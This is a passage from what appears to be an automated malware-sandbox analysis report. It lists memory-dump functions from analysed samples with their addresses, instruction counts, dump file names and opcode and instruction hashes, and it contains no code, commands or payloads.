                                                                                      • Opcode Fuzzy Hash: 791833995ff4ef8288f0c3d9afd9166a7f99aacca7bdcb0108ea3e8d7f79ffe2
                                                                                      • Instruction Fuzzy Hash: 9001BC35B0A24D9FE711EBE8C8945DDBBB0EF45314F1442F6D085C7292EA74A7898B80
                                                                                      Function 00007FFD9B851598 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3be3b2ef890e5cbc0cb11a4e459773ad58e51dec46866432fa7d6e1d1a116a5d
                                                                                      • Instruction ID: 7c697182711062fb8e9d18047b6916a598c720bac869f1a677293959a3c9b86a
                                                                                      • Opcode Fuzzy Hash: 3be3b2ef890e5cbc0cb11a4e459773ad58e51dec46866432fa7d6e1d1a116a5d
                                                                                      • Instruction Fuzzy Hash: AE018B31A0A24D9FEB11EBE8C8545ECBBB0EF05314F1442E6D085C7292EA74A6858B80
                                                                                      Function 00007FFD9B8515A0 Relevance: .0, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fc2e0d5a5f49263382390a27c37dd123e826b48a8e938bca87cc3f127662af2d
                                                                                      • Instruction ID: e98cad557cfd7d1177dd54be76ddd351f826bf98e716a927b98371f1675989cc
                                                                                      • Opcode Fuzzy Hash: fc2e0d5a5f49263382390a27c37dd123e826b48a8e938bca87cc3f127662af2d
                                                                                      • Instruction Fuzzy Hash: 2FF03C34E0A28D9FEB11EBE8C4545EDBBB0EF06314F1442E6D04597296EAB8A7848781
                                                                                      Function 00007FFD9B854912 Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8376cbb7b3933dfa230c10f18b49edecd579481b3855a6a76dd0945f40bde7a1
                                                                                      • Instruction ID: 71f5ec22cc7540c487899bf14c2012bdc74057ac736007387362576ddad4477d
                                                                                      • Opcode Fuzzy Hash: 8376cbb7b3933dfa230c10f18b49edecd579481b3855a6a76dd0945f40bde7a1
                                                                                      • Instruction Fuzzy Hash: F7E01220F1A11E4BFBB4F7D4C8657BD62919F98300F1240F4D40EE32E1DD686E418744
                                                                                      Function 00007FFD9B850705 Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b964bff2f6a6961ad1cf75d421020a0df73bbfdbbcb758d8d1abc78bf5b962b
                                                                                      • Instruction ID: 375f94b19b632173cf5298a298fe8c8d6ce43a122fa3daa30afe922bdab01160
                                                                                      • Opcode Fuzzy Hash: 1b964bff2f6a6961ad1cf75d421020a0df73bbfdbbcb758d8d1abc78bf5b962b
                                                                                      • Instruction Fuzzy Hash: A9C08C04F6B40F80E93033E918660ACA1449BCDA10FD300F2C40C800A0ACCE23854582
                                                                                      Function 00007FFD9B851BC8 Relevance: .0, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6a5162551570903f5fde7fa87322f93947087cdf53ab7cc84a8b4d8a915173be
                                                                                      • Instruction ID: 90cf8c754db9ae23dae602948c38b98a96241a23d17ba0aa70d65329bcf3dc68
                                                                                      • Opcode Fuzzy Hash: 6a5162551570903f5fde7fa87322f93947087cdf53ab7cc84a8b4d8a915173be
                                                                                      • Instruction Fuzzy Hash: 79C08C3051180C8FC918EF6AC88481433A0FB1D204BC200D0E009C7270D259ECC1C740
                                                                                      Function 00007FFD9B85495F Relevance: .0, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e9c13c8da01c61ae524ad78fd6388e08fd6384994589c5503da6e87394e6a9d
                                                                                      • Instruction ID: c9305b08d9c9ebab72d10c239b4727b163fe10b4bd1d9f4e197bbf95f2200cea
                                                                                      • Opcode Fuzzy Hash: 3e9c13c8da01c61ae524ad78fd6388e08fd6384994589c5503da6e87394e6a9d
                                                                                      • Instruction Fuzzy Hash: 00C00281F0E15B05FBA167D556653B816444F29361F0A41F9D58E865E29D8C6A010229
                                                                                      Function 00007FFD9B850728 Relevance: .0, Instructions: 8COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5291abeda7496d3368404e744cf063c162d98c6f93be64673f1fd6acfcbac899
                                                                                      • Instruction ID: ca93419c4397df00adcf1cd6b28de68156d5d5429f8af9110807299fd8481ce5
                                                                                      • Opcode Fuzzy Hash: 5291abeda7496d3368404e744cf063c162d98c6f93be64673f1fd6acfcbac899
                                                                                      • Instruction Fuzzy Hash: 86B01200D9740F00D53433F50C560A470005B8C100FC201F0D409800A5ECCD12944242
                                                                                      Function 00007FFD9B8565CA Relevance: .0, Instructions: 5COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 664f51b4be95657885ecb00bd1670f54884d3ea374658e10a3708023eebff43c
                                                                                      • Instruction ID: cb013964fb1baf35e34a20a9c5784481737fe41fb38d5dad52c418262bfc5c03
                                                                                      • Opcode Fuzzy Hash: 664f51b4be95657885ecb00bd1670f54884d3ea374658e10a3708023eebff43c
                                                                                      • Instruction Fuzzy Hash: 5DB01210E080194DE3609B949C1037C90A0EF2C300F1100F2C02DE31C3EB681D004600
                                                                                      Function 00007FFD9B8530A0 Relevance: .0, Instructions: 2COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 49a013b6b0d9c2700980600510b396546e3a2fc01e3d891a89915a86f1a37ee5
                                                                                      • Instruction ID: 4882607c50c8872b35f863e533ae0df1c7d568bbd1fa3a3c3847261cdf3f9ad8
                                                                                      • Opcode Fuzzy Hash: 49a013b6b0d9c2700980600510b396546e3a2fc01e3d891a89915a86f1a37ee5
                                                                                      • Instruction Fuzzy Hash:

                                                                                      Non-executed Functions

                                                                                      Function 00007FFD9BC47C40 Relevance: .5, Instructions: 543COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1913382163.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc40000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b61567fc40d2c36f8a6546af42db634941ad812f4be2bb9eb52739c388c7620
                                                                                      • Instruction ID: 9e107e0984e8a3c47087915bcb02312698711f24eb7cc8940817b36719405ccc
                                                                                      • Opcode Fuzzy Hash: 1b61567fc40d2c36f8a6546af42db634941ad812f4be2bb9eb52739c388c7620
                                                                                      • Instruction Fuzzy Hash: 6E02B430B1995D4FEBA8EBB884756BC62D3FF99340F16047AE40DD32E7DD28AA418741
                                                                                      Function 00007FFD9BC51F8C Relevance: .4, Instructions: 441COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1913382163.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc40000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f4931b13a32a8e17fa81d1ea7045cf9b1b1631d53b9472e787e0bb4e7e78aece
                                                                                      • Instruction ID: 702cbe5b8f781e19b670f3959c67f154ee3d3c04f7179ef7010c3088aaa44278
                                                                                      • Opcode Fuzzy Hash: f4931b13a32a8e17fa81d1ea7045cf9b1b1631d53b9472e787e0bb4e7e78aece
                                                                                      • Instruction Fuzzy Hash: 1CE1A130A0DA4D8FEBA8DFA8D8557E977E1FF58311F00422EE80DC7295DB74A9458B81

                                                                                      Executed Functions

                                                                                      Function 00007FFD9B891698 Relevance: .3, Instructions: 264COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dcf0c344b3573b6e5e080c5c9aee580836deaaff12324a69be30a9b9c860c103
                                                                                      • Instruction ID: 6bc7eb91591628e0133f45659bbfb54df52923bc2a56a4354e44fdbd746cb666
                                                                                      • Opcode Fuzzy Hash: dcf0c344b3573b6e5e080c5c9aee580836deaaff12324a69be30a9b9c860c103
                                                                                      • Instruction Fuzzy Hash: EE91D1B1A19A8D4FEB49DB68C8797EA7FE0FF59301F0401BAD049D72E6DBB864018741
                                                                                      Function 00007FFD9BC83848 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: 3c4b608ac0bb8195514d5e4c8cd1a73c0ddcbf1660201d21f0ad8e443e357172
                                                                                      • Instruction ID: 364ef8fe8932e407ecb465f0c2436f01dc41b2ac575e23264a9b280a0fd08334
                                                                                      • Opcode Fuzzy Hash: 3c4b608ac0bb8195514d5e4c8cd1a73c0ddcbf1660201d21f0ad8e443e357172
                                                                                      • Instruction Fuzzy Hash: EA414B70E09A0E9FDB58DFA4C4649FDB7B1FF89300F11447ED01AA7296DA396A02CB50
                                                                                      Function 00007FFD9BC83372 Relevance: .3, Instructions: 325COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d5e70b48e68b29fb3ddb113fa14a728b7f869fa2fda4793ef7a3595f69f2ff96
                                                                                      • Instruction ID: e4766e64fc998697f5473cd30adf6b0e3ef616234305d424aa77ccadf2a1260f
                                                                                      • Opcode Fuzzy Hash: d5e70b48e68b29fb3ddb113fa14a728b7f869fa2fda4793ef7a3595f69f2ff96
                                                                                      • Instruction Fuzzy Hash: 5CC1E570B09E4A8FE759DB68C0616A8B7A1FF88300F455179E04ECBB96DB38B951C780
                                                                                      Function 00007FFD9BC817C0 Relevance: .3, Instructions: 300COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 21ce6161a41ad3cfb58f6ab88fd08a395c97cc112427614302239f27d3e29f75
                                                                                      • Instruction ID: 8469594aab20ec47a1be10b19fec772641aa2658d2d2df25f6f27c2438cc68e6
                                                                                      • Opcode Fuzzy Hash: 21ce6161a41ad3cfb58f6ab88fd08a395c97cc112427614302239f27d3e29f75
                                                                                      • Instruction Fuzzy Hash: 2891A530718A1D8FDB58DB58D8999B9B3F2FF99314B1541A9D04EC72A2DA31FC42CB40
                                                                                      Function 00007FFD9BC80D42 Relevance: .3, Instructions: 299COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ea4c6a8094aaca33c8747ce9cb9cdf451e0521fb4022e0f04282ae02b7ade2d5
                                                                                      • Instruction ID: 6b1336f5fd64a662250ade75b0b98031f202eec4d6f0b72d2af8abd1aadf0eb5
                                                                                      • Opcode Fuzzy Hash: ea4c6a8094aaca33c8747ce9cb9cdf451e0521fb4022e0f04282ae02b7ade2d5
                                                                                      • Instruction Fuzzy Hash: 7221F762F1FD8B8AF77522F818329BC55419F12B21F1A85B6D45EC60F7DC6C3A415283
                                                                                      Function 00007FFD9BC83BDA Relevance: .3, Instructions: 283COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2392614e81edced045e5f3df57e5e62f690d955f6d59342749c323b2e028284a
                                                                                      • Instruction ID: db4ce4fb41653ea351974e5e2849889223c668a9b6afc67c1d4caac1f2113d31
                                                                                      • Opcode Fuzzy Hash: 2392614e81edced045e5f3df57e5e62f690d955f6d59342749c323b2e028284a
                                                                                      • Instruction Fuzzy Hash: ECB1C23061995A8FEB59CF58C4E05B837A1FF84310B5556BDE84BCB69AC738F981CB80
                                                                                      Function 00007FFD9B890A19 Relevance: .3, Instructions: 281COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 59a6fbf07f8dd61ec72371d967b28d0dfe3e8f00f992f5286d3130a901ebe19e
                                                                                      • Instruction ID: 48b7e92666ba2b93ffb47ac0788a99d4a943e7bbb2257a6bc903fce882491a6b
                                                                                      • Opcode Fuzzy Hash: 59a6fbf07f8dd61ec72371d967b28d0dfe3e8f00f992f5286d3130a901ebe19e
                                                                                      • Instruction Fuzzy Hash: B4713B11F2EA4E0BE769667C08652B97AC2EF89715F16023DE4DFC32E7DD1C69034241
                                                                                      Function 00007FFD9BC828A6 Relevance: .3, Instructions: 264COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7857f5c28768113b2bf0c554bc5e4d8eeb5ed2191872a6670bc6f4d28eacd8fe
                                                                                      • Instruction ID: 323ba2ad6a64da772e14737bfb606b1b9a830d52b5fddc4e9caa236bf416c237
                                                                                      • Opcode Fuzzy Hash: 7857f5c28768113b2bf0c554bc5e4d8eeb5ed2191872a6670bc6f4d28eacd8fe
                                                                                      • Instruction Fuzzy Hash: 87814C31B0EF4A4FE3759AF894291BD77E0EF45310B16057ED49ECB1A2DA3879028791
                                                                                      Function 00007FFD9BC815AB Relevance: .2, Instructions: 233COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 294a8f2c4cd22d94cb4760cfc144aa80dee2b04d28fcf64778a11a56bf5692c1
                                                                                      • Instruction ID: 78ec2358f18ee31a62558528d46ada6f13fb146c2e3fbe796cbd4d539990f512
                                                                                      • Opcode Fuzzy Hash: 294a8f2c4cd22d94cb4760cfc144aa80dee2b04d28fcf64778a11a56bf5692c1
                                                                                      • Instruction Fuzzy Hash: E471A030E1994E8FEB65DBB488656BCBBF1FF49300F5505BAD00ED71A1DE386A418700
                                                                                      Function 00007FFD9BC80A12 Relevance: .2, Instructions: 211COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a2ec7750cb187ac7a67658b28dabf114c08aa8dd00edd9eadc48e7b20a31a3f7
                                                                                      • Instruction ID: 6fe9e80efe36e0c52cbf8b7a588ae019d4176d06c3abfb931650f79f1e96836f
                                                                                      • Opcode Fuzzy Hash: a2ec7750cb187ac7a67658b28dabf114c08aa8dd00edd9eadc48e7b20a31a3f7
                                                                                      • Instruction Fuzzy Hash: EC51067170EC4D4FE7B8DA6888665BD77C1FF54714F0602B9E09EC35B2DE28AA058781
                                                                                      Function 00007FFD9BC84B01 Relevance: .2, Instructions: 194COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 27d74facc0c09d84889eaf54cc095dbf185238898cef9d4f7772ff2c189aa0f7
                                                                                      • Instruction ID: 160a6774439be03a06440563c00288622b407ce3102e62a4ade2393737ab01d8
                                                                                      • Opcode Fuzzy Hash: 27d74facc0c09d84889eaf54cc095dbf185238898cef9d4f7772ff2c189aa0f7
                                                                                      • Instruction Fuzzy Hash: F761053060AF0A9FE3A9DB64D0A167977E1FF44310B51557EC48BC7AA6CB39B842CB40
                                                                                      Function 00007FFD9B890850 Relevance: .2, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f1ac412fbb30b241b7e90ee97cd070d8fb9c31051f8901a744bb4825fa66af02
                                                                                      • Instruction ID: 77ad2c606ece71159875c6f80a37915779f9efdc0db1b251289ab06ee9b7dd60
                                                                                      • Opcode Fuzzy Hash: f1ac412fbb30b241b7e90ee97cd070d8fb9c31051f8901a744bb4825fa66af02
                                                                                      • Instruction Fuzzy Hash: 98511932B1DA5C4FDB64DB7C88646BA7BE1FF4D311F0501BAE09AC72A2DE24A8018741
                                                                                      Function 00007FFD9BC83ADF Relevance: .2, Instructions: 175COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 78c9539ab877425638a7d5f429cf7a85ff16abe78de85a62f3d49457e41f1547
                                                                                      • Instruction ID: f5da564f7840a9a3ffc53b4b1fc5d0b26d6da4ab35f525752b096fe372f7a9ec
                                                                                      • Opcode Fuzzy Hash: 78c9539ab877425638a7d5f429cf7a85ff16abe78de85a62f3d49457e41f1547
                                                                                      • Instruction Fuzzy Hash: 7C51E03061E94A8BEB2D8F68C4B04797BA1FF81301B1585BDE44B8B5DBCA38F551C781
                                                                                      Function 00007FFD9BC83AB5 Relevance: .2, Instructions: 173COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3241e7719236470d1cdb1ce6893751e914e4de38f1d52b2fc493c15e0a5bc40d
                                                                                      • Instruction ID: 8505c2ccd43b106fab6d5c599461af8523e546fc4566618ac3b9d4d243df4c21
                                                                                      • Opcode Fuzzy Hash: 3241e7719236470d1cdb1ce6893751e914e4de38f1d52b2fc493c15e0a5bc40d
                                                                                      • Instruction Fuzzy Hash: 1C51E43061E95A8FEB2D8F68C4B54797BA1EF8130071555F9E44A8B1EBCA3CE942C781
                                                                                      Function 00007FFD9BC80FC5 Relevance: .1, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a4e60730952815ac55e288d50a803057b57eff410c98990eb4139a4dac3ecb97
                                                                                      • Instruction ID: 20b690caff28e14617c5d8b4fafadb61ae3e2625e4e1e22f290f600658809e3c
                                                                                      • Opcode Fuzzy Hash: a4e60730952815ac55e288d50a803057b57eff410c98990eb4139a4dac3ecb97
                                                                                      • Instruction Fuzzy Hash: 10512E71E1995D8FDBA8DB68C8A5AFD77F1EB58301F1500BAD00ED32A1DE346A84CB41
                                                                                      Function 00007FFD9B8907D3 Relevance: .1, Instructions: 128COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 030477792076c8ebdd1c3e9c18d7ede877ce088cd3e58545b60d8815bf450a10
                                                                                      • Instruction ID: da41e6813a6dfd3a533d54b59cc3cc6a0dd3933e19ddee11632063bc38ba3303
                                                                                      • Opcode Fuzzy Hash: 030477792076c8ebdd1c3e9c18d7ede877ce088cd3e58545b60d8815bf450a10
                                                                                      • Instruction Fuzzy Hash: E6319033B1D6980FEB21A77C58650FA3FE0EF4A239B05017BD4D9C7193DD2450478692
                                                                                      Function 00007FFD9BC85127 Relevance: .1, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 656d8947dc13b5d9284c0d9de78179536090d4ce593d9d618a52c7f5bd02d154
                                                                                      • Instruction ID: 1c016d32c065ad1bb194b17599fb76b7d8527a7eb80482b79134b8020ed35ef1
                                                                                      • Opcode Fuzzy Hash: 656d8947dc13b5d9284c0d9de78179536090d4ce593d9d618a52c7f5bd02d154
                                                                                      • Instruction Fuzzy Hash: D541513270C9498FDF98FB68C4A5DA8B7E1FB69311B0401AAD04AC7192DE35FD55CB81
                                                                                      Function 00007FFD9BC800D7 Relevance: .1, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
